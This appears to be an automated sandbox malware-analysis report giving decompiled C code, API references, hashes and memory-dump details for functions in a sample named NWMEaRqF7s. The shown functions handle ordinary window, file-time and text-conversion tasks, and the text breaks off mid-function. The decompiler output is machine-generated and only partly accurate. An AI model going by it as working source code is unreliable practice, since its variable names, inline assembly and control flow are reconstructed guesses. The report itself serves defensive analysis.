Instruction ID: 7995706fe7658207796502790e8806651987640a3b712c00c511c8f021993b2d
Opcode Fuzzy Hash: 1507b21e0b8afc40092b3418b41c9e4713093c8a94b41042287dd16bbe8cc815
Instruction Fuzzy Hash: 1481BB75A10209DFDB08CF95D894BADBBB1FF48314F248298E909AB355C774EA81CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00417E15, Relevance: 6.2, APIs: 4, Instructions: 173
windowCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E00417E15(signed int __ecx, void* __edx) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				char _v76;
				intOrPtr _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t63;
				signed int _t64;
				intOrPtr _t70;
				signed int _t72;
				signed int _t73;
				signed int _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t84;
				signed int _t86;
				signed int _t88;
				signed int _t92;
				intOrPtr* _t99;
				signed int _t100;
				signed int _t126;
				intOrPtr _t127;
				void* _t144;
				void* _t147;
				intOrPtr* _t148;
				signed int** _t150;
				signed int* _t151;
				signed int _t154;
				signed int _t156;
				void* _t158;
				void* _t161;

				_t144 = __edx;
				_t126 = __ecx;
				_t158 = _t161;
				_t154 = __ecx;
				_t63 =  *((intOrPtr*)(__ecx + 4));
				_push(_t147);
				if(_t63 != 0) {
					_t64 =  *(_t63 + 0x28);
					__eflags = _t64;
					if(_t64 == 0) {
						goto L4;
					} else {
						_t126 = _t64;
						_t72 = E0040AF65(0, _t126, _t147);
						__eflags = _t72;
						_v8 = _t72;
						if(_t72 == 0) {
							goto L4;
						} else {
							_t73 = IsWindowVisible( *(_t72 + 0x20));
							asm("sbb eax, eax");
							_t75 =  ~_t73 + 1;
							__eflags = _t75;
							_v24 = _t75;
							if(_t75 != 0) {
								GetWindowRect( *(E00409C97(0, _t126, _t158, GetDesktopWindow()) + 0x20),  &_v56);
								GetWindowRect( *(_v8 + 0x20),  &_v40);
								asm("cdq");
								asm("cdq");
								__eflags = _v56.right - _v56.left - _t144;
								E0040CA11(_v8, _v56.right - _v56.left - _t144 >> 1, _v56.bottom - _v56.top - _t144 >> 1, 0, 0, 0);
								E0040CA4F(_v8, 1);
							}
							_t77 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 0x50));
							_t148 = _t154 + 0x48;
							_t78 =  *((intOrPtr*)( *_t77))(_t77, 0x4369e0, _t148);
							__eflags = _t78;
							if(_t78 < 0) {
								_t80 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 0x50));
								_t81 =  *((intOrPtr*)( *_t80))(_t80, 0x436a38,  &_v16);
								__eflags = _t81;
								if(_t81 >= 0) {
									_t82 = _v16;
									 *((intOrPtr*)( *_t82 + 0x14))(_t82,  &_v20);
									_t84 = _v16;
									 *((intOrPtr*)( *_t84 + 8))(_t84);
									_t86 = _v20;
									__eflags = _t86;
									if(_t86 != 0) {
										_t150 = _t154 + 8;
										_v12 =  *((intOrPtr*)( *_t86))(_t86, 0x439320, _t150);
										_t88 = _v20;
										 *((intOrPtr*)( *_t88 + 8))(_t88);
										_t81 = _v12;
										__eflags = _t81;
										if(__eflags >= 0) {
											_t151 =  *_t150;
											 *( *_t151)(_t151, 0x439310, _t154 + 0xc);
											goto L21;
										}
									} else {
										_t81 = 0x80004005;
									}
								}
							} else {
								_t99 =  *_t148;
								_t151 = _t154 + 0x4c;
								_t100 =  *((intOrPtr*)( *_t99 + 0xc))(_t99, 0, 0x4395b0, _t151);
								__eflags =  *_t151;
								_v12 = _t100;
								if( *_t151 == 0) {
									_v12 = 0x80004003;
								}
								__eflags = _v12;
								if(__eflags >= 0) {
									L21:
									_t92 = E0041733F(0, _t154, _t151, _t154, __eflags);
									__eflags = _v24;
									_t156 = _t92;
									if(_v24 != 0) {
										__eflags = _v40.right - _v40.left;
										E0040CA11(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
										E0040CA4F(_v8, 0);
									}
									_t81 = _t156;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										__eflags = _v40.right - _v40.left;
										E0040CA11(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
										E0040CA4F(_v8, 0);
									}
									_t81 = _v12;
								}
							}
							return _t81;
						}
					}
				} else {
					L4:
					_push(_t158);
					_push(_t126);
					_t2 =  &_v76; // 0x4423e8
					_v76 = 0x442480;
					E0041F7F4(_t2, 0x43c590);
					asm("int3");
					_push(4);
					E0041F6EA(E00431BFC, 0, _t147, _t154);
					_t127 = E0040F014(0x104);
					_v88 = _t127;
					_t70 = 0;
					_v76 = 0;
					if(_t127 != 0) {
						_t70 = E0040D519(_t127);
					}
					return E0041F7C2(_t70);
				}
			}

0x00417e15
0x00417e15
0x00417e16
0x00417e1d
0x00417e1f
0x00417e26
0x00417e27
0x00417e2e
0x00417e31
0x00417e33
0x00000000
0x00417e35
0x00417e35
0x00417e37
0x00417e3c
0x00417e3e
0x00417e41
0x00000000
0x00417e43
0x00417e46
0x00417e4e
0x00417e50
0x00417e50
0x00417e51
0x00417e54
0x00417e6f
0x00417e7b
0x00417e86
0x00417e95
0x00417e96
0x00417e9b
0x00417ea5
0x00417ea5
0x00417ead
0x00417eb2
0x00417ebc
0x00417ebe
0x00417ec0
0x00417f21
0x00417f30
0x00417f32
0x00417f34
0x00417f3a
0x00417f44
0x00417f47
0x00417f4d
0x00417f50
0x00417f53
0x00417f55
0x00417f60
0x00417f6c
0x00417f6f
0x00417f75
0x00417f78
0x00417f7b
0x00417f7d
0x00417f7f
0x00417f8d
0x00000000
0x00417f8d
0x00417f57
0x00417f57
0x00417f57
0x00417f55
0x00417ec2
0x00417ec2
0x00417ec6
0x00417ed1
0x00417ed4
0x00417ed6
0x00417ed9
0x00417edb
0x00417edb
0x00417ee2
0x00417ee5
0x00417f8f
0x00417f91
0x00417f96
0x00417f99
0x00417f9b
0x00417fab
0x00417fb5
0x00417fbe
0x00417fbe
0x00417fc3
0x00417eeb
0x00417eeb
0x00417eee
0x00417efe
0x00417f08
0x00417f11
0x00417f11
0x00417f16
0x00417f16
0x00417ee5
0x00417fc9
0x00417fc9
0x00417e41
0x00417e29
0x00417e29
0x004037e3
0x004037e6
0x004037ec
0x004037f0
0x004037f7
0x004037fc
0x004037fd
0x00403804
0x00403813
0x00403815
0x00403818
0x0040381c
0x0040381f
0x00403821
0x00403821
0x0040382b
0x0040382b

APIs

IsWindowVisible.USER32(?), ref: 00417E46
GetDesktopWindow.USER32 ref: 00417E56
GetWindowRect.USER32 ref: 00417E6F
GetWindowRect.USER32 ref: 00417E7B

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Window$Rect$DesktopVisible
String ID:
API String ID: 1055025324-0
Opcode ID: 9fd2e131ecfaca2e4f596605befef15e013afeb60e8cd7df608e467907c7161e
Instruction ID: 8e4b7480244538acadc42369d4a2fea37553eaefd090f2d635b64ddf38e68156
Opcode Fuzzy Hash: 9fd2e131ecfaca2e4f596605befef15e013afeb60e8cd7df608e467907c7161e
Instruction Fuzzy Hash: 3651D975A0020AEFCB00DFE8C984DAEBBB9FF48344B2445A9F505E7251CB35AD41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041B2DE, Relevance: 6.1, APIs: 4, Instructions: 132
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041B2DE(void* __ecx, void* __eflags, signed int* _a4) {
				char _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t52;
				long _t56;
				signed int* _t75;
				signed int* _t78;
				signed int* _t81;
				struct _FILETIME* _t88;
				void* _t100;
				CHAR* _t101;
				signed int* _t102;
				void* _t103;
				void* _t107;

				_t85 = __ecx;
				_t102 = _a4;
				_t100 = __ecx;
				E0041F330(__ecx, _t102, 0, 0x128);
				E00402FE8(0, _t85, _t100, _t102, _t103,  &(_t102[8]), 0x104,  *(_t100 + 0xc), 0xffffffff);
				_t52 =  *(_t100 + 4);
				_t107 = _t52 -  *0x43664c; // 0xffffffff
				if(_t107 == 0) {
					L21:
					return 1;
				}
				_t88 =  &_v12;
				if(GetFileTime(_t52, _t88,  &_v20,  &_v28) != 0) {
					_t56 = GetFileSize( *(_t100 + 4), 0);
					_t102[6] = _t56;
					_t102[7] = 0;
					if(_t56 != 0xffffffff || 0 != 0) {
						_t101 =  *(_t100 + 0xc);
						if( *((intOrPtr*)(_t101 - 0xc)) != 0) {
							_t102[8] = (_t88 & 0xffffff00 | GetFileAttributesA(_t101) == 0xffffffff) - 0x00000001 & _t57;
						} else {
							_t102[8] = 0;
						}
						if(E0041B166( &_v12) == 0) {
							 *_t102 = 0;
							_t102[1] = 0;
						} else {
							_t81 = E0041B280( &_v36,  &_v12, 0xffffffff);
							 *_t102 =  *_t81;
							_t102[1] = _t81[1];
						}
						if(E0041B166( &_v20) == 0) {
							_t102[4] = 0;
							_t102[5] = 0;
						} else {
							_t78 = E0041B280( &_v36,  &_v20, 0xffffffff);
							_t102[4] =  *_t78;
							_t102[5] = _t78[1];
						}
						if(E0041B166( &_v28) == 0) {
							_t102[2] = 0;
							_t102[3] = 0;
						} else {
							_t75 = E0041B280( &_v36,  &_v28, 0xffffffff);
							_t102[2] =  *_t75;
							_t102[3] = _t75[1];
						}
						if(( *_t102 | _t102[1]) == 0) {
							 *_t102 = _t102[2];
							_t102[1] = _t102[3];
						}
						if((_t102[4] | _t102[5]) == 0) {
							_t102[4] = _t102[2];
							_t102[5] = _t102[3];
						}
						goto L21;
					} else {
						goto L2;
					}
				}
				L2:
				return 0;
			}

0x0041b2de
0x0041b2e6
0x0041b2f3
0x0041b2f5
0x0041b308
0x0041b30d
0x0041b313
0x0041b319
0x0041b42d
0x00000000
0x0041b42f
0x0041b327
0x0041b334
0x0041b341
0x0041b34a
0x0041b34d
0x0041b350
0x0041b356
0x0041b35c
0x0041b374
0x0041b35e
0x0041b35e
0x0041b35e
0x0041b382
0x0041b39e
0x0041b3a0
0x0041b384
0x0041b38d
0x0041b394
0x0041b399
0x0041b399
0x0041b3ae
0x0041b3cf
0x0041b3d2
0x0041b3b0
0x0041b3b9
0x0041b3c0
0x0041b3c6
0x0041b3c6
0x0041b3e0
0x0041b401
0x0041b404
0x0041b3e2
0x0041b3eb
0x0041b3f2
0x0041b3f8
0x0041b3f8
0x0041b40c
0x0041b411
0x0041b416
0x0041b416
0x0041b41f
0x0041b424
0x0041b42a
0x0041b42a
0x00000000
0x00000000
0x00000000
0x00000000
0x0041b350
0x0041b336
0x00000000

APIs

_memset.LIBCMT ref: 0041B2F5

Part of subcall function 00402FE8: _wctomb_s.LIBCMT ref: 00402FF8

GetFileTime.KERNEL32(?,?,?,?), ref: 0041B32C
GetFileSize.KERNEL32(?,00000000), ref: 0041B341

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: File$SizeTime_memset_wctomb_s
String ID:
API String ID: 26245289-0
Opcode ID: 460687b828287e484770bf3ac6ef00e5158413d383cc5e2fa65d22da16e9dfdf
Instruction ID: ab47600a3e4a610a652e78fe131df308bb0f6e3dfc8c5e458132c93997bab673
Opcode Fuzzy Hash: 460687b828287e484770bf3ac6ef00e5158413d383cc5e2fa65d22da16e9dfdf
Instruction Fuzzy Hash: BF413E715007099FCB24DF65C9858EBB7F8FF083507108A2EE5A6D3690E734E984CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040CE23, Relevance: 6.1, APIs: 4, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040CE23(void* __ecx, struct HWND__** _a4) {
				struct HWND__** _v8;
				struct HWND__** _v12;
				long _t31;
				struct HWND__** _t32;
				struct HWND__** _t44;
				struct HWND__** _t45;
				long _t47;
				void* _t49;
				struct HWND__** _t63;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
					_t31 = _a4;
					if(_t31 != 0) {
						if( *((intOrPtr*)(_t31 + 8)) == 0) {
							L4:
							_t32 = E0041A1B3( *((intOrPtr*)(_t49 + 0x4c)) + 0x40, _t31, 0);
							_v12 = _t32;
							_a4 = _t32;
							E00406B97( &_a4);
							while(_a4 != 0) {
								_t37 =  *((intOrPtr*)(E00406B97( &_a4)));
								_v8 =  *((intOrPtr*)(E00406B97( &_a4)));
								if((E0040CB3B(_t37) & 0x00020000) != 0) {
									break;
								} else {
									_t45 = _v8;
									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
										continue;
									} else {
										L16:
										_t44 = _v8;
										goto L17;
									}
								}
								goto L18;
							}
							_a4 = _v12;
							_t31 = E0040CC2A( &_a4);
							while(_a4 != 0) {
								_t63 =  *(E0040CC2A( &_a4));
								_v8 = _t63;
								if(_t63[2] == 0) {
									L13:
									_t31 = E0040CB3B(_t63);
									if((_t31 & 0x00020000) == 0) {
										continue;
									}
								} else {
									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
										goto L16;
									} else {
										_t63 = _v8;
										goto L13;
									}
								}
								goto L18;
							}
						} else {
							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
							_t44 = _a4;
							if(_t47 == 1) {
								L17:
								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
							} else {
								goto L4;
							}
						}
						L18:
					}
				}
				return _t31;
			}

0x0040ce26
0x0040ce27
0x0040ce2a
0x0040ce31
0x0040ce37
0x0040ce3c
0x0040ce4c
0x0040ce65
0x0040ce6d
0x0040ce75
0x0040ce78
0x0040ce82
0x0040cec3
0x0040ce98
0x0040ce9c
0x0040cea9
0x00000000
0x0040ceab
0x0040ceab
0x0040ceb1
0x00000000
0x0040cf1e
0x0040cf1e
0x0040cf1e
0x00000000
0x0040cf1e
0x0040ceb1
0x00000000
0x0040cea9
0x0040cece
0x0040ced8
0x0040cf17
0x0040ceee
0x0040cef3
0x0040cef6
0x0040cf0b
0x0040cf0b
0x0040cf15
0x00000000
0x00000000
0x0040cef8
0x0040cf06
0x00000000
0x0040cf08
0x0040cf08
0x00000000
0x0040cf08
0x0040cf06
0x00000000
0x0040cef6
0x0040ce4e
0x0040ce57
0x0040ce5c
0x0040ce5f
0x0040cf21
0x0040cf2a
0x00000000
0x00000000
0x00000000
0x0040ce5f
0x0040cf2c
0x0040cf2c
0x0040ce3c
0x0040cf30

APIs

SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 0040CE57
SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 0040CEBC
SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 0040CF01
SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 0040CF2A

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 98a5e719becc5e9530cc4bbf65561d4dc1d48f7fc4dbf92ba7db1ce7141c8203
Instruction ID: 66e3d6775930df425968a4b0a54b9f9d1576368976f6134ca70a6ff43a027803
Opcode Fuzzy Hash: 98a5e719becc5e9530cc4bbf65561d4dc1d48f7fc4dbf92ba7db1ce7141c8203
Instruction Fuzzy Hash: A2319070500115FBDB24DF51C8C5EAE7BA9EF41390F10817BF905AB291DA38AD40DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0042CE52, Relevance: 6.1, APIs: 4, Instructions: 101
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0042CE52(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E0041E998( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E00425DF3( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E0041F8D2(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0xa045ff98
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0xa045ff98
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t27 = _t56 + 0xac; // 0xa045ff98
								_t57 =  *_t27;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x0042ce5a
0x0042ce61
0x0042ce76
0x00000000
0x0042ce68
0x0042ce6a
0x0042ce82
0x0042ce87
0x0042ce8a
0x0042ce8d
0x0042ceb6
0x0042cebb
0x0042cebf
0x0042cf40
0x0042cf52
0x0042cf5b
0x0042cf5d
0x0042ce9d
0x0042ce9d
0x0042cea0
0x0042cea2
0x0042cea5
0x0042cea5
0x0042cea5
0x0042cea5
0x00000000
0x0042ceab
0x0042cf1f
0x0042cf1f
0x0042cf24
0x0042cf2a
0x0042cf2d
0x0042cf2f
0x0042cf32
0x0042cf32
0x0042cf32
0x0042cf32
0x00000000
0x0042cf36
0x0042cec1
0x0042cec4
0x0042cec4
0x0042ceca
0x0042cecd
0x0042cef4
0x0042cef7
0x0042cef7
0x0042cefd
0x00000000
0x00000000
0x0042ceff
0x0042cf02
0x00000000
0x00000000
0x0042cf04
0x0042cf04
0x0042cf07
0x0042cf07
0x0042cf0d
0x0042ce7b
0x0042ce7b
0x0042cf16
0x00000000
0x0042cf16
0x0042cecf
0x0042ced2
0x00000000
0x00000000
0x0042ced6
0x0042cee4
0x0042cee7
0x0042ceed
0x0042ceef
0x0042cef2
0x00000000
0x00000000
0x00000000
0x0042cef2
0x0042ce8f
0x0042ce92
0x0042ce94
0x0042ce9a
0x0042ce9a
0x00000000
0x0042ce6c
0x0042ce6c
0x0042ce71
0x0042ce73
0x0042ce73
0x00000000
0x0042ce71
0x0042ce6a

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042CE82
__isleadbyte_l.LIBCMT ref: 0042CEB6
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000800,?,00000800,0042C711,?,?,00000002), ref: 0042CEE7
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000800,?,00000800,0042C711,?,?,00000002), ref: 0042CF55

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 3807aa945e28d61556327e1f51631c5f31dded84c93292a081c3416f1b4e28e9
Instruction ID: 976c8db8c8d1bf3a5b4f198b380441d655359f927b8502cec911b7ca074ebcd7
Opcode Fuzzy Hash: 3807aa945e28d61556327e1f51631c5f31dded84c93292a081c3416f1b4e28e9
Instruction Fuzzy Hash: 7B31F431B10265EFDB20DFA4E8C09BE7BA5BF02310F9685AAF4609B291D334DD50DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00415210, Relevance: 6.1, APIs: 4, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00415210(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr* _t77;
				signed int _t80;
				void* _t82;
				void* _t83;
				intOrPtr* _t84;

				_t83 = __eflags;
				_push(0x20);
				E0041F6EA(E00432E8C, __ebx, __edi, __esi);
				_t80 = 0;
				 *((intOrPtr*)(_t82 - 0x10)) = 0;
				 *((intOrPtr*)(_t82 - 0x14)) = 0x436aa8;
				_t68 =  *((intOrPtr*)(_t82 + 8));
				_t71 = _t82 - 0x1c;
				 *(_t82 - 4) = 0;
				E0040DBE0(_t82 - 0x1c, _t83,  *((intOrPtr*)(_t68 - 0xb0)));
				_t77 =  *((intOrPtr*)(_t82 + 0x14));
				_t84 = _t77;
				 *(_t82 - 4) = 1;
				_t85 = _t84 == 0;
				if(_t84 == 0) {
					E004037E3(_t68, _t71, _t77, 0, _t85);
				}
				 *_t77 = _t80;
				if( *((intOrPtr*)(_t68 - 8)) == _t80) {
					_push(GetDC( *( *((intOrPtr*)( *((intOrPtr*)(_t68 - 0xac)) + 0x20)) + 0x20)));
					_t51 = E0040E644(_t68, _t71, _t77, _t80, __eflags);
					__eflags = _t51 - _t80;
					 *((intOrPtr*)(_t68 - 8)) = _t51;
					if(_t51 == _t80) {
						goto L3;
					} else {
						__eflags =  *(_t82 + 0xc) - _t80;
						if( *(_t82 + 0xc) != _t80) {
							IntersectRect(_t82 - 0x2c, _t68 - 0x9c,  *(_t82 + 0xc));
						} else {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t77 =  *((intOrPtr*)(_t82 + 0x14));
							_t80 = 0;
						}
						E0040E903(_t82 - 0x14, _t77, _t82, CreateRectRgnIndirect(_t82 - 0x2c));
						E0040E410( *((intOrPtr*)(_t68 - 8)), _t82 - 0x14, 1);
						_t69 =  *((intOrPtr*)(_t68 - 8));
						__eflags = _t69 - _t80;
						if(_t69 != _t80) {
							_t70 =  *((intOrPtr*)(_t69 + 4));
						} else {
							_t70 = 0;
						}
						__eflags =  *((intOrPtr*)(_t82 - 0x18)) - _t80;
						 *_t77 = _t70;
						 *(_t82 - 4) = 0;
						if( *((intOrPtr*)(_t82 - 0x18)) != _t80) {
							_push( *((intOrPtr*)(_t82 - 0x1c)));
							_push(_t80);
							E0040D3B7();
						}
						 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t82 - 0x14)) = 0x4361d8;
						E0040E956(_t82 - 0x14);
						_t53 = 0;
						__eflags = 0;
					}
				} else {
					L3:
					 *(_t82 - 4) = 0;
					if( *((intOrPtr*)(_t82 - 0x18)) != _t80) {
						_push( *((intOrPtr*)(_t82 - 0x1c)));
						_push(_t80);
						E0040D3B7();
					}
					 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t82 - 0x14)) = 0x4361d8;
					E0040E956(_t82 - 0x14);
					_t53 = 0x80004005;
				}
				return E0041F7C2(_t53);
			}

0x00415210
0x00415210
0x00415217
0x0041521c
0x0041521e
0x00415221
0x00415228
0x00415231
0x00415234
0x00415237
0x0041523c
0x00415241
0x00415246
0x0041524a
0x0041524c
0x0041524e
0x0041524e
0x00415253
0x00415258
0x0041529b
0x0041529c
0x004152a1
0x004152a3
0x004152a6
0x00000000
0x004152a8
0x004152a8
0x004152ab
0x004152cf
0x004152ad
0x004152b6
0x004152b7
0x004152b8
0x004152b9
0x004152ba
0x004152bd
0x004152bd
0x004152e3
0x004152f1
0x004152f6
0x004152f9
0x004152fb
0x00415301
0x004152fd
0x004152fd
0x004152fd
0x00415304
0x00415307
0x00415309
0x0041530d
0x0041530f
0x00415312
0x00415313
0x00415313
0x00415318
0x0041531f
0x00415326
0x0041532b
0x0041532b
0x0041532b
0x0041525a
0x0041525a
0x0041525d
0x00415261
0x00415263
0x00415266
0x00415267
0x00415267
0x0041526c
0x00415273
0x0041527a
0x0041527f
0x0041527f
0x00415332

APIs

__EH_prolog3.LIBCMT ref: 00415217

Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804

GetDC.USER32(?), ref: 00415295
IntersectRect.USER32 ref: 004152CF
CreateRectRgnIndirect.GDI32(?), ref: 004152D9

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: H_prolog3Rect$CreateException@8IndirectIntersectThrow
String ID:
API String ID: 2872313494-0
Opcode ID: 506e79158975ac838f48e3fec4624e35c69e0d7bb44190366a378939756601cf
Instruction ID: 57a31d86cf499e8c3f284dac0a6a6315687b59808bb24555e4edea15a439fa37
Opcode Fuzzy Hash: 506e79158975ac838f48e3fec4624e35c69e0d7bb44190366a378939756601cf
Instruction Fuzzy Hash: 4B316071D0021ADFCF01DFA4C485ADEBB74AF58314F10846AE911BB191C7B85A85CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041D8AF, Relevance: 6.1, APIs: 4, Instructions: 85
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0041D8AF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t34;
				intOrPtr* _t62;
				void* _t63;
				void* _t64;

				_t64 = __eflags;
				_push(0x24);
				E0041F6EA(E004338B2, __ebx, __edi, __esi);
				_t62 =  *((intOrPtr*)(_t63 + 8)) + 0xffffffc0;
				E0040DBE0(_t63 - 0x14, _t64,  *((intOrPtr*)( *((intOrPtr*)(_t63 + 8)) - 0x24)));
				 *(_t63 - 4) = 0;
				if( *((intOrPtr*)(_t63 + 0x10)) <=  *((intOrPtr*)(_t62 + 0x3c))) {
					L8:
					__eflags =  *(_t62 + 0x30);
					if( *(_t62 + 0x30) == 0) {
